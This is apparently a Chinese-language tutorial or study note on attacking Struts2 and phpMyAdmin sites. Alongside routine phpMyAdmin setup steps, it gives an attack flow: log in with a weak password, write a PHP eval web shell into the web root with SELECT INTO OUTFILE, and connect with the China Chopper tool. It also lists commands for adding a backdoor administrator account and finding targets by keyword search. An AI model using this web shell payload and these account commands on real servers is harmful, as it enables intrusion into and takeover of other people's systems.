什么是struts2?
Struts2是一个基于MVC设计模式的Web应用框架,它本质上相当于一个servlet,在MVC设计模式中,Struts2作为控制器(Controller)来建立模型与视图的数据交互。其被普遍应用于阿里、京东等各大网站。
本次讲的struts2漏洞是什么?
- S2-016
- S2-019
- S2-032
什么是phpMyAdmin?
phpMyAdmin 是一个以PHP为基础,以Web-Base方式架构在网站主机上的MySQL的数据库管理工具,让管理者可用Web接口管理MySQL数据库。
如何使用phpMyAdmin?
- 下载phpMyAdmin,这是官网连接
- 解压并备份
- 找到config.sample.inc.php,改名为config.inc.php,用文本编辑器打开该文件,找到下列代码:
$cfg['blowfish_secret'] = ''
改为
$cfg['blowfish_secret'] = 'c4ca4238a0b923820dcc509a6f75849b';//一个长字符串密码就行
- 进入apache的conf文件夹下,新建一个phpmyadmin.conf文件,文本编辑器打开,加入下列代码:
Alias /phpmyadmin "c:/phpMyAdmin/"
<Directory "c:/phpMyAdmin/">
Options Indexes FollowSymLinks MultiViews
AllowOverride all
Require all granted
php_admin_value upload_max_filesize 128M
php_admin_value post_max_size 128M
php_admin_value max_execution_time 360
php_admin_value max_input_time 360
</Directory>
- 在该文件夹内找到配置文件httdp.conf,用文本编辑器打开,在末尾增加一行
Include conf/phpmyadmin.conf
本次讲的phpMyAdmin漏洞是什么?
通过phpMyAdmin弱口令拿shell
本次使用的工具或方法是什么?
- 工具:struts2漏洞利用工具、听潮URL采集工具
- 方法:关键词搜索(UPUPW)、弱口令、
本次使用了哪些命令?其作用是什么?
命令 | 代码 |
---|---|
查看用户 | net user |
新建用户 | net user 123 123 /add |
提权 | localgroup administrators 123 /add |
删除用户 | net user 123 /del |
查看IP | ipconfig |
查看端口 | netstat -abn |
整理本次的攻击流程
- 利用弱口令进入phpMyAdmin后台
- 在sql中输入以下语句
SELECT '<?php @eval($_POST[xk]);?>'
INTO OUTFILE 'D://upupw//htdocs//xk.php'
- 利用菜刀连接
- 后续可利用小马或者大马完成渗透